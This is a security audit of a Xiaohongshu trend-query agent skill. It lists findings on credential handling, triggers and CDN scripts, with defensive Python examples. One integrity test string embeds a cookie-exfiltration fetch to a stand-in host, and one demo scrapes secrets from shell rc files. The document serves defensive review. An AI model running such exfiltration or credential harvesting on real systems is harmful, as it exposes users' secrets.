
Security audit

小红书每日爆款笔记 (Xiaohongshu daily viral notes)

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its stated purpose, but it handles API-key setup and reads local shell profile files in ways users should review before installing.

Install only if you are comfortable giving the skill a RedFox API key and letting it query RedFox/Xiaohongshu data. Set REDFOX_API_KEY for the current session only, or inject it from a proper secret store, rather than asking the agent to write it into shell startup files. Be aware that the generated HTML loads export libraries from public CDNs and that subscribing enables recurring daily output.

SkillSpector

By NVIDIA

Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Findings (16)

Context-Inappropriate Capability

Severity: High. Confidence: 98%.

The workflow explicitly instructs the agent to help users permanently set REDFOX_API_KEY in shell startup files or in the Windows user environment. This drives the agent to modify long-lived system configuration and to handle the secret in a way that exposes it to other processes, future sessions and shared accounts, and to accidental disclosure in terminal history and logs.

Description-Behavior Mismatch

Severity: Medium. Confidence: 88%.

The skill adds a subscription/push capability beyond its manifest description of querying and analyzing trending content. Autonomous recurring delivery changes the trust model: the skill keeps acting and producing output without a fresh user request, which raises the chance of unwanted notifications, data leakage in shared contexts, and use of the agent as a persistence channel.

Description-Behavior Mismatch

Severity: Medium. Confidence: 84%.

The workflow adds HTML/PDF export behavior that the skill metadata does not describe, moving the skill from analysis into file generation and distribution. Exported artifacts can carry embedded links, unreviewed content or sensitive data, and may be shared outside the interaction in which they were produced.

Context-Inappropriate Capability

Severity: Medium. Confidence: 90%.

The script falls back to reading shell startup files such as .zshrc and .bashrc to harvest REDFOX_API_KEY, which extends credential access beyond the process environment and is not what a user expects of an HTML generator. Even though it targets one variable, parsing a personal shell config is broader secret access than the task needs and exposes other local secrets and sensitive configuration to the process.

Context-Inappropriate Capability

Severity: Medium. Confidence: 95%.

The script reads the user's shell profile files to extract REDFOX_API_KEY without explicit consent at runtime. Accessing ~/.zshrc, ~/.bashrc and similar files is broader than the stated purpose of fetching rankings requires, and can expose sensitive local configuration or secrets beyond the intended execution context.
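The two findings above describe the same pattern: a lookup that starts with the process environment and then scrapes the user's rc files. The block below is an added example, not code from the skill, showing that pattern beside an environment-only loader so the difference in exposure is concrete. The rc-file names, the fake key values and the temporary home directory are all constructed for the demonstration.

```python
# Added example, not code from the skill: the "fall back to the shell rc file"
# credential lookup the findings describe, next to an environment-only loader.
# Every file name and key value used here is constructed for the demonstration.
import re
import tempfile
from pathlib import Path
from typing import Optional

# Shell startup files a fallback of this kind typically scans.
RC_FILES = (".zshrc", ".bashrc", ".bash_profile", ".profile")

# `export NAME=value` or `NAME="value"`; good enough for the demo, not a shell parser.
_EXPORT_RE = re.compile(r"""^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=['"]?([^'"\s#]+)['"]?""")


def parse_rc_exports(text: str) -> dict:
    """Return every NAME=value assignment in an rc file.

    A fallback that wants one variable still has to read and parse the whole
    file, so every other secret in it passes through the process.
    """
    found = {}
    for line in text.splitlines():
        m = _EXPORT_RE.match(line)
        if m:
            found[m.group(1)] = m.group(2)
    return found


def load_key_with_rc_fallback(name: str, env: dict, home: Path) -> Optional[str]:
    """The pattern flagged above: check the process environment, then scrape rc files."""
    if env.get(name):
        return env[name]
    for rc in RC_FILES:
        path = home / rc
        if path.is_file():
            exports = parse_rc_exports(path.read_text(encoding="utf-8", errors="replace"))
            if name in exports:
                return exports[name]
    return None


def load_key_env_only(name: str, env: dict) -> str:
    """Hardened loader: one variable from the process environment, or a clear error.

    It never opens anything under the home directory, so the user decides how
    the value gets into the environment (session export, secret store, CI).
    """
    value = env.get(name)
    if not value:
        raise RuntimeError(
            f"{name} is not set. Export it in this shell session or inject it from "
            "your secret store; this script does not read shell startup files."
        )
    return value


def other_secrets_read(name: str, home: Path) -> set:
    """Variables the rc fallback reads that are not the one it was looking for.

    Run against a real home directory to see how much the fallback over-reads.
    """
    seen = set()
    for rc in RC_FILES:
        path = home / rc
        if path.is_file():
            seen.update(parse_rc_exports(path.read_text(encoding="utf-8", errors="replace")))
    seen.discard(name)
    return seen


def make_demo_home() -> Path:
    """Constructed fixture: a temp home with a .zshrc holding several fake secrets."""
    home = Path(tempfile.mkdtemp(prefix="demo-home-"))
    (home / ".zshrc").write_text(
        "# constructed rc file for the example\n"
        "export PATH=$HOME/bin:$PATH\n"
        'export REDFOX_API_KEY="rf-demo-key-0000"\n'
        'export AWS_SECRET_ACCESS_KEY="aws-demo-secret-1111"\n'
        "GITHUB_TOKEN=ghp_demo_2222\n",
        encoding="utf-8",
    )
    return home


if __name__ == "__main__":
    home = make_demo_home()
    print("fallback found:", load_key_with_rc_fallback("REDFOX_API_KEY", {}, home))
    print("also read along the way:", sorted(other_secrets_read("REDFOX_API_KEY", home)))
    try:
        load_key_env_only("REDFOX_API_KEY", {})
    except RuntimeError as exc:
        print("env-only loader:", exc)
```

Pointing `other_secrets_read` at a real home directory is a quick way to show a user exactly which unrelated credentials a fallback of this kind would have parsed on their machine; the hardened loader's error message tells them how to supply the one value it needs without granting that access.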

Description-Behavior Mismatch

Severity: Medium. Confidence: 84%.

The script writes fetched data to an arbitrary local path given with --output_json, which takes the skill beyond querying and analysis into filesystem modification. Not malicious in itself, but an unexpected write can overwrite user files or leave data in a location the user did not anticipate, especially when an agent chooses the path on the user's behalf.
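The fix a reviewer would ask for is to confine the output path to a workspace directory and to refuse to clobber existing files. The block below is an added example, not the skill's own code; the workspace directory and file names are constructed for the demonstration, and `--output_json` is taken to be a plain path string as the finding describes.

```python
# Added example, not code from the skill: confining an agent-supplied
# --output_json path to a workspace directory and refusing to clobber files.
# Directory and file names below are constructed for the demonstration.
import json
import os
import tempfile
from pathlib import Path


def safe_output_path(base_dir: Path, requested: str) -> Path:
    """Resolve `requested` under base_dir or raise.

    Path.resolve() follows symlinks and collapses '..', so a symlink inside the
    workspace that points outside is caught as well. An absolute `requested`
    replaces base_dir when joined, and then fails the containment check.
    """
    base = Path(base_dir).resolve()
    target = (base / requested).resolve()
    try:
        target.relative_to(base)
    except ValueError:
        raise ValueError(f"refusing to write outside {base}: {target}") from None
    if target.suffix.lower() != ".json":
        raise ValueError(f"expected a .json output path, got {target.name}")
    return target


def write_json_once(base_dir: Path, requested: str, data: dict) -> Path:
    """Write `data` to a confined path, creating the file exclusively.

    O_EXCL makes create-and-write atomic: there is no window between an
    exists() check and the open() in which the target could appear. Mode 0o600
    keeps the fetched data readable by the invoking user only.
    """
    target = safe_output_path(base_dir, requested)
    target.parent.mkdir(parents=True, exist_ok=True)
    # Raises FileExistsError instead of silently overwriting.
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        json.dump(data, fh, ensure_ascii=False, indent=2)
    return target


def make_demo_workspace() -> Path:
    """Constructed fixture: an empty temp directory standing in for the skill's workspace."""
    return Path(tempfile.mkdtemp(prefix="demo-workspace-"))


if __name__ == "__main__":
    ws = make_demo_workspace()
    print(write_json_once(ws, "exports/daily.json", {"notes": []}))
    for bad in ("../escape.json", "/etc/passwd", "exports/daily.json", "report.html"):
        try:
            write_json_once(ws, bad, {})
        except (ValueError, FileExistsError) as exc:
            print(f"{bad!r}: {type(exc).__name__}: {exc}")
```

If overwriting is a legitimate need, expose it as an explicit flag that drops O_EXCL rather than making it the default; an agent will otherwise pick whatever path the prompt suggests.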

Context-Inappropriate Capability

Severity: Medium. Confidence: 91%.

The generated page loads executable JavaScript from public CDNs at runtime, a supply-chain trust dependency outside the skill package. If the CDN, the dependency or the transit path is compromised, arbitrary script runs in the page context and can tamper with displayed data, harvest visible content, or abuse whatever ambient privileges the hosting environment grants.
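The standard mitigation for a CDN dependency is Subresource Integrity: the generator pins each script tag to the hash of the bytes reviewed at build time, and the browser refuses a file that no longer matches. The block below is an added example, not the skill's code; the library body, the CDN URL and the version number are constructed placeholders.

```python
# Added example, not code from the skill: pinning the CDN-loaded export
# libraries with Subresource Integrity, so that a swapped or tampered script
# is refused by the browser instead of executing in the page. The URL and the
# sample library body below are constructed for the demonstration.
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_token(body: bytes, algo: str = "sha384") -> str:
    """Integrity token as the browser expects it: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def pinned_script_tag(url: str, body: bytes) -> str:
    """<script> tag pinned to the exact bytes reviewed when the HTML was generated.

    crossorigin="anonymous" is required: without it the browser will not enforce
    integrity on a cross-origin script. The URL should name a fixed version;
    a moving "latest" URL would fail integrity on every upstream release.
    """
    return (
        f'<script src="{url}" integrity="{sri_token(body)}" '
        'crossorigin="anonymous"></script>'
    )


def verify_sri(body: bytes, integrity: str) -> bool:
    """CI-side check: does the body currently served from the CDN still match?

    An integrity attribute may list several tokens; the browser accepts the body
    if it matches any token of the strongest algorithm present. This simplified
    check passes on any matching token and ignores unknown algorithms, as browsers do.
    """
    for token in integrity.split():
        algo, sep, expected = token.partition("-")
        if not sep or algo not in SRI_ALGOS:
            continue
        actual = base64.b64encode(hashlib.new(algo, body).digest()).decode("ascii")
        if hmac.compare_digest(actual.encode("ascii"), expected.encode("utf-8")):
            return True
    return False


# Constructed stand-in for a library body fetched once, at build time, and reviewed.
DEMO_LIBRARY = b"/* constructed export library */ window.exportToPdf = function () {};\n"
# Placeholder URL; a real one would point at a version-pinned path on the chosen CDN.
DEMO_URL = "https://cdn.example.invalid/export-lib@1.2.3/dist/export.min.js"


if __name__ == "__main__":
    tag = pinned_script_tag(DEMO_URL, DEMO_LIBRARY)
    print(tag)
    token = sri_token(DEMO_LIBRARY)
    print("unmodified body passes:", verify_sri(DEMO_LIBRARY, token))
    tampered = DEMO_LIBRARY + b"fetch('https://collector.invalid/?d=' + document.cookie);"
    print("tampered body passes:  ", verify_sri(tampered, token))
```

`verify_sri` is the piece to run in CI against the live CDN URL: if the served bytes drift from the pinned token, the build should fail and a human should look at the upstream change before the pin is updated. Vendoring the libraries into the skill package removes the runtime dependency entirely and is the simpler option when the export libraries are small.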

Vague Triggers

Severity: Medium. Confidence: 91%.

The README tells users to invoke the skill with unrestricted natural-language requests, giving it a broad activation surface: ordinary conversation not clearly meant as a tool invocation can trigger it. In agent environments that means unintended data retrieval, external API usage or subscription actions whenever ambiguous user text is read as a command.

Vague Triggers

Severity: Medium. Confidence: 89%.

The example phrase is ordinary conversational language that could appear in unrelated dialogue, so accidental invocation is likely. Because the skill performs external lookups and leads into follow-on actions such as loading more results or enabling daily pushes, broad trigger phrasing raises the risk of unintended tool execution and of noisy or unauthorized actions.

Vague Triggers

Severity: Medium. Confidence: 81%.

The trigger phrases are broad enough that ordinary conversation about trending content or keywords could invoke the skill unintentionally. Since the skill makes API calls and generates files, an accidental invocation can cause unwanted external requests, data processing or file creation outside the user's intent.

Vague Triggers

Severity: Medium. Confidence: 84%.

The generic trend-query example is ambiguous and could match normal conversation about "what is popular lately", activating the skill where the user did not intend a Xiaohongshu data lookup. In this skill the ambiguity matters more because activation leads to network access, use of API-backed data, and follow-on workflow steps such as subscriptions or HTML generation.

Vague Triggers

Severity: Medium. Confidence: 80%.

The trigger conditions match common conversational requests about trends or hot content, so the skill can activate in situations the user did not intend. Here that matters because activation leads to external API access and downstream behavior such as analysis formatting or subscription prompting, increasing unintended data retrieval and user confusion.

Missing User Warnings

Severity: High. Confidence: 97%.

The document tells the agent to proactively help set a permanent environment variable holding an API key, but does not adequately warn about the sensitivity of the credential or the risk of a persistent system change. The combination pushes users toward unsafe secret handling and normalizes the agent modifying system configuration, which is especially risky on shared machines and in enterprise environments.

Missing User Warnings

Severity: Medium. Confidence: 86%.

The subscription feature sets up ongoing automatic output at a scheduled time, but the workflow does not surface that the behavior persists, what it implies for notifications, or how the user can control or revoke it. Users may not realize they are enabling recurring actions, and repeated push content raises privacy, nuisance and abuse concerns if delivered in the wrong context.

Missing User Warnings

Severity: Medium. Confidence: 88%.

Reading shell rc/profile files without an upfront user-facing warning is a transparency and consent problem, especially in an agent skill where users do not expect local file inspection. The behavior is hidden and can reach credentials or other sensitive shell configuration unexpectedly.

Missing User Warnings

Severity: Medium. Confidence: 96%.

The code silently inspects shell startup files for a credential, sensitive local data access that is not clearly disclosed to the user. In an agent skill this is more dangerous because users expect a data-query tool, not one that reads private configuration files from their home directory.

VirusTotal

65 of 65 vendors reported this skill as clean (no detections). This is a signature and heuristic scan of the package files for known malware; it does not evaluate the credential-handling and agentic-behavior issues listed above, which the SkillSpector and static-analysis sections cover.


Static analysis

Detected: suspicious.exposed_secret_literal (Critical), at two locations:
  • scripts/gen_xhs_html.py:194
  • scripts/xhs_daily_fetcher.py:173

The rule reports that the file appears to expose a hardcoded API secret or token. Before treating this as a leaked credential, open the flagged lines and check whether they contain an actual secret value or only the variable name REDFOX_API_KEY used for the environment and rc-file lookup described in the SkillSpector findings; a literal-matching rule can fire on either. The two cases differ sharply: a committed key must be rotated and removed from history, while a bare name reference is a false positive that needs no action beyond the credential-handling changes already recommended.